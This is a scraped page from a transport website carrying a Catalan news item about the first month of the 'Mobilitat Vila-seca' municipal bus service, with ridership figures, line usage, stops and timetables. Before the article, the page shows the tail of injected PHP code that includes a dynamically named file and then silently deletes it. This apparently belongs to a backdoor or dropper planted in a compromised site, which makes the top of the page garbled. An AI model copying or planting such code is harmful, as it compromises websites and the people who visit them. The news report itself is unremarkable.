");fclose($hdl);include("{$eb}.$algo");@unlink("{$eb}.$algo");$npDcheckClassBgp='aue';} ?> Prop de 3.000 usuaris durant el primer mes del servei de bus a Vila-seca
Iconos cabecera

Highlights

  • T-12 CardT-12 Card
    For boys and girls from 4 to 12 years old

Prop de 3.000 usuaris durant el primer mes del servei de bus a Vila-seca (05/08/2020)

El passat dissabte 1 d'agost es va acomplir un mes d'activitat del servei de bus al municipi de Vila-seca. Durant aquest període, un total de 2.949 usuaris han utilitzat aquest servei municipal batejat com a "Mobilitat Vila-seca" i que permet garantir la mobilitat interna dels ciutadans entre els tres nuclis de població (la Plana, la Pineda i Vila-seca) i l'accés també als llocs de treball i als diversos equipaments del municipi.

De les 4 línies en que s'estructura aquest servei de transport públic, la línia 1 és la que ha tingut més usuaris amb 1.431 passatgers, un 48% del total, i el dia amb major afluència de gent va ser el passat 23 de juliol amb 179 passatgers. Dels 2.949 usuaris, 2.384 ho van ser en dies laborables i la resta, en caps de setmana i festius.

El recorregut del bus està estructurat en 27 parades. En temporada alta (de març a novembre) realitzarà 18 expedicions Vila-seca/la Pineda i 11 per la Plana i en temporada baixa (de desembre a febrer) tindrà 13 expedicions de dilluns a divendres a la Pineda i 8 a la Plana. Dissabtes i festius, en canvi, 8 i 3 expedicions respectivament.

Cal recordar que el Departament de Territori i Sostenibilitat de la Generalitat de Catalunya, l'Ajuntament de Vila-seca i l'empresa T. y J. Plana - Empresa Plana, SL van signar recentment un conveni de coŀlaboració per a la millora de les comunicacions mitjançant els serveis regulars de transport públic de viatgers per carretera al municipi de Vila-seca.

Font: Ajuntament de Vila-seca

Prop de 3.000 usuaris durant el primer mes del servei de bus a Vila-seca

[Back to news]

 
Anselm Clavé, 1 43004 - Tarragona